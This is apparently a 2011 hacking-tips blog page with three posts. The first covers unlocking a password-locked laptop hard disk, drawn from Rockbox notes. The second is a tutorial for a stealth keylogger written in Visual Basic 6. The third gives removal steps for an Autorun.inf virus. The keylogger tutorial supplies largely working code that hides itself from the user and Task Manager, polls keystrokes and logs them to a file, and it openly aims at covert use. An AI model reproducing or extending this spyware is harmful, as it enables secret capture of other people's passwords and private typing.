Pages

Sunday, November 6, 2011

ow to crack/unlock locked hdd (hard disk) password?



Ok guys, here is a simple n effective way to crack/unlock a locked hdd/harddisk

password. So lets check it out...
During development of the Rockbox firmware, on several occations the
harddisk has become locked, i.e. password protected. This results in
the Archos displaying:

Part. Error
Pls Chck HD

We are still not 100% sure why it happened. Theories range from
low-power conditions to accidental chip select failure. It has also
happened for normal users, using the standard Archos-supplied
firmware, although it was more frequent for us developers.

Note: None of us developers have experienced this problem since march 2002.

We do however know how to unlock the disk:

Windows/DOS unlock
Note: This requires taking the Archos apart, which will void your warranty!

Grab atapwd
Create a bootable DOS floppy disk, and put atapwd.exe on it
Remove the harddisk from your Archos and plug it into a laptop (or a
standard PC, using a 3.5" => 2.5" IDE adapter)
Boot from the floppy and run atapwd.exe
Select the locked harddrive and press enter for the menu
For Fujitsu disks: Choose "unlock with user password", then "disable
with user password". The password is empty, so just press enter at the
prompt.
For Toshiba and Hitachi disks, if the above doesn't work: Choose
"unlock with master password", then "disable with master password".
The password is all spaces.
Your disk is now unlocked. Shut down the computer and remove the disk.
Big thanks to Magnus Andersson for discovering the Fujitsu (lack of)
user password!

There is also a program for win32, ArchosUnlock.exe, that creates a
linux boot disk with the below mentioned patched isd200 driver.

Linux unlock
For those of us using Linux, we have written an isd200 driver patch.

This modified driver will automatically unlock
the disk when you connect your Archos via USB, so you don't have to do
anything special. Apply the patch to a 2.4.18 linux kernel tree.

Still locked?
If the above suggestions don't work, here's some background info about
the disk lock feature:

The disk lock is a built-in security feature in the disk. It is part
of the ATA specification, and thus not specific to any brand or
device.

A disk always has two passwords: A User password and a Master
password. Most disks support a Master Password Revision Code, which
can tell you if the Master password has been changed, or it it still
the factory default. The revision code is word 92 in the IDENTIFY
response. A value of 0xFFFE means the Master password is unchanged.

A disk can be locked in two modes: High security mode or Maximum
security mode. Bit 8 in word 128 of the IDENTIFY response tell you
which mode your disk is in: 0 = High, 1 = Maximum.

In High security mode, you can unlock the disk with either the user or
master password, using the "SECURITY UNLOCK DEVICE" ATA command. There
is an attempt limit, normally set to 5, after which you must power
cycle or hard-reset the disk before you can attempt again.

In Maximum security mode, you cannot unlock the disk! The only way to
get the disk back to a usable state is to issue the SECURITY ERASE
PREPARE command, immediately followed by SECURITY ERASE UNIT. The
SECURITY ERASE UNIT command requires the Master password and will
completely erase all data on the disk. The operation is rather slow,
expect half an hour or more for big disks. (Word 89 in the IDENTIFY
response indicates how long the operation will take.)



Thanks...

How to make a keylogger? (Write keylogger in VB)



Before we start programming, we need to answer a basic question: what is a keylogger?
As the name implies (key+logger) – a keylogger is a computer program that logs (records) the keys (keyboard buttons) pressed by a user. This should be simple to understand. Lets say that I am doing something at my computer.
A keylogger is also running (working) on this computer. This would mean that the keylogger is “listening” to all the keys I am pressing and it is writing all the keys to a log file of some sort. Also, as one might have guessed already, we don’t want the user to know that their keys are being logged. So this would mean that our keylogger should work relatively stealth and must not, in any case, show its presence to the user. Good, now we know what a keylogger as and we have an idea of its functions, lets move on to the next step.

=========================================
Basic Concepts: What needs to be achieved
=========================================
Ok, now lets plan our program, what should such keyloger do and what it should not. Significant difference to previous section is in the sense that here we shall discuss the LOGIC, the instructions that our program will follow.
Keylogger will:
1 – listen to all the key strokes of the user.
2 – save these keys in a log file.
3 – during logging, does not reveal its presence to the user.
4 – keeps doing its work as long as the used is logged on regardless of users actions.


==========================================
Implementation: Converting logic into code
==========================================
We shall use Visual Basic because it is much easier and simple to understand comparing to C++ or Java as far as novice audience is concerned. Although programmers consider it somewhat lame to code in VB but truthfully speaking, its the natural language for writing hacking/cracking programs. Lets cut to the chase – start your VB6 environment and we are ready to jump the ride!

We need a main form, which will act as HQ to the program.

First of all, as our program shall run, we need to make sure it is hidden. This should be very simple to accomplish:
Private Sub Form_Load()
Me.Visisble = False
End Sub
This makes our program invisible to the human eye. To make it invisible to computers eye too, we need to add this line in the Form_Load() event App.TaskVisible = False . This enabled our logger to run in stealth mode and the regular Task Manager will not see our application. Although it will still be possible to see it in the processes tab, there are “ways” to make it hidden.
Figure them out yourself, they have nothing to do with programming.

OK, now that our program has run in stealth mode, it should do its essential logging task. For this, we shall be using a whole load of API. These are the interfaces that the Application Platform (windows) itself provides us in those annoying dll files.

There are 3 methods to listen for keys:

* GetAsyncKeyState
* GetKeyboardState
* Windows Hooks

Althought the last method is easier to use, this will not work on Windows98 and also it is NOT very precise. Many people use it, but as my experiences revealed, Keyboard Hooks are only a good way of blocking keys and nothing else. The most exact and precise method in my experience is GetAsyncKeyState()

So lets use this function, but where is that damn thing and how to use it?

Private Declare Function GetAsyncKeyState Lib “USER32″ (ByVal vKey As Long) As Integer

This is how we use a function already present in a dll file. In this case we are using the user32.dll and the function we are using is GetAsyncKeyState().
The arguments (Long vKey), and return value (Long) shall be discussed later, right now its enough to know that this function can listen to keystrokes.

What we need next is to run this function infinitely (as long as the system is running). To do this, just put a Timer control on the form and name it tmrTimer.
This timer is used to run the same line of code forever. Note that a while loop with a universally true condition would also accomplish same, but the while loop will certainly hang the system and will lead to its crash as opposed to timer.

Timer will not hang the system at all because a while loop tends to carry out the instruction infinitely WITHOUT any break and it also keeps the control to itself, meaning that we cannot do any other job as the loop is running (and with a universally true statement, the while loop will not let the control pass to ANYWHERE else in the program making all the code useless) while the Timer control just carries out the instuction after a set amount of time.

So the two possibilities are:

Do While 1=1
‘our use of the GAKS (GetAsyncKeyState) function Loop
and
Private Sub tmrTimer_Timer()
‘our use of the GAKS function
End Sub

Timer being set, lets move on to see how the GAKS function works and how are we going to use it. Basically what the GAKS function does is that it tells us if a specific key is being pressed or not. We can use the GAKS function like this: Hey GAKS() check if the ‘A’ key is being pressed.
And the GAKS function will tell us if it is being pressed or not. Sadly, we can’t communicate with processors like this, we have to use some
amboyant 007 style

If GAKS(65)<>0 Then
Msgbox “The ‘A’ key is being pressed”
Else
Msgbox “The ‘A’ key is not being pressed”
End If


Now lets see how this code works: GAKS uses ASCII key codes and 65 is the ASCII code for ‘A’ If the ‘A’ key is being pressed then GAKS will return a non-zero value (often 1) and if the key is not being pressed then it will return 0. Hence If GAKS(65)<>0 will be comprehended by the VB compiler as “If the ‘A’ key is being pressed”.

Sticking all this stuff together, we can use this code to write a basic functional keylogger:

Private Sub tmrTimer_Timer()
Dim i As Integer
Static data As String
For i = 65 to 90 ‘represents ASCII codes from ‘A’ to ‘Z’
If GAKS(i)<>0 Then data = data & Chr(i)
Next i
If GAKS(32) <> 0 Then data = data &a ” ” ‘checking for the space bar
If Len(data)>=100 Then
Msgbox “The last 100 (or a couple more) are these ” & VBNewLine & data
data = “”
End If
End Sub

This alone is enough to create a basic functioning keylogger although it is far from practical use. But this does the very essential function of keylogger. Do try it and modify it to your needs to see how GAKS works and how do the Timer delays affect the functionality of a keylogger. Honestly speaking, the core of our keylogger is complete, we have only to sharpen it now and make it precise, accurate and comprehensive.

The first problem that one encounters using GAKS is that this function is far too sensitive than required. Meaning that if we keep a key pressed for 1/10th of a second, this function will tell us that the key has been pressed for at least 2 times, while it actually was a sigle letter. For this, we must sharpen it.
We need to add what I call “essential time count” to this function. This means that we need to tell it to generate a double key press only if the key has been pressed for a specified amount of time.
For this, we need a whole array of counters. So open your eyes and listen attentively.

Dim count(0 to 255) As Integer

This array is required for remembering the time count for the keys. i.e. to remember for how long the key has been pressed.

Private Sub tmrTimer_Timer()
Dim i As Integer
Const timelimit As Integer = 10
Static data As String
For i=0 To 255 ‘for all the ASCII codes
If GAKS(i)<>0 Then
If count(i) = 0 Then ‘if the key has just been pressed
data = data & Chr(i)
ElseIf count(i) < timelimit Then
count(i) = count(i) + 1 ‘add 1 to the key count
Else
count(i) = 0 ‘initialize the count
data = data & Chr(i)
End If
Else ‘if the key is not being pressed
count(i) = 0
End If
Next i
End Sub

What we have done here is that we have set a time limit before the GAKS function will tell us that the key is being pressed. This means, in simple words, that if we press and hold the ‘A’ key, the GAKS function will not blindly tell us the ‘A’ key is being pressed, but it will wait for sometime before telling us again that the key is being pressed. This is a very important thing to do, because many users are not very fast typists and tend to press a key for somewhat longer than required.
Now what is left (of the basic keylogger implementation) is just that we write the keys to a file. This should be very simple:

Private Sub timrTimer_Timer()
‘do all the fuss and listen for keystrokes
‘if a key press is detected
Open App.Path & “\logfile.txt” For Append As #1
Print #1, Chr(keycode);
Close #1
End Sub

Note that this is the very basic concept of writing a keylogger, we have yet not added autostart option and neither have we added an post-compile functionality edit options. These are advanced issues for the beginners. If you would like me to write about them, do tell me and I will write about them too, step by step.

Please do comment on this article, telling me what it lacks and what was not required in it. Feel free to post this anywhere you like, just make sure you don’t use it for commercial purposes. If you have any questions about any part of it let me know and I will try to answer.

Thanks,,,

How to delete Autorun.inf virus?



Once it happened to a friend of mine, when his newly bought laptop was infected with this autorun.inf virus. This virus corrupted almost all the drives on the Hard disk, and when ever he tried to double click on the drive or opening any drive it opened in a new window. In some cases, when your drive is infected with this Autorun.inf virus, you won’t be able to access the drive completely. You have to browse the drive by Exploring it i.e; Ctrl+E keys from the keyboard.

Sometimes ever you will not be able to see hidden files even if you have Show hidden files Enabled under Folder Options. well, this are all the wonders of this Autorun.inf virus.

I am going to show you this rare method of removing Autorun.inf manually using just winrar application, not any antivirus or malware programs.

Solution to Remove Autorun.inf Virus

Step 1: First Disable CD/DVD or USB Autorun in windows
When ever you plug a usb device to the system or insert a cd/dvd disk, The windows Autorun Run utility runs and displays certain options like Open files to view, Play, Do nothing etc.


Although this a good utility provided by windows xp operating system, It is sometimes very dangerous too. When A virus infected Usb drive or Cd is plugged into the system, the virus gets a chance to attack you Operating system, by running automatically when you plug your device in.

Follow the below steps and ensure your systems safety.

1) Click Start –> Run and type GPEDIT.MSC – This opens Group Policy editor window.

2) On the left side –> expand Computer Configuration–> Administrative Templates–> System.
for windows 7--> expand Computer Configuration–> Administrative Templates–> Windows Components.

3) Locate the entry for Turn autoplay off on the right side.

4) Double click it and select “Enabled”



Step 2: Open Winrar.exe (Start–>All Programs–>WinRar–>WinRar.exe)

Step 3: Now Browse to any drive that is infected with Autorun.inf virus using winrar explorer.

Step4: Here you will see all the hidden files under winrar for that particular drive.

Step 5: Look for the file Autorun.inf and open it using notepad.

Step 6: In that Autorun file, some .EXE file will be mentioned that will be executed along with the autorun file. This exe file is the main culprit.


Step 7: Note the exe file mentioned in the Autorun.inf file. Close this Autorun.inf file.

Step 8: Now look for that .Exe file in the drive (Ex: c:/), Delete that .exe file along with Autorun.inf

Step 9: Restart your Operating System. Now your system is free with Autorun.inf Virus.

Note: Repeat the same process if your Usb or Pendrives are infected with Autorun.inf virus.

If you know anyother method to remove autorun virus from windows operating system, them kindly let me know by posting your method using the Comments on this post.

Thanks...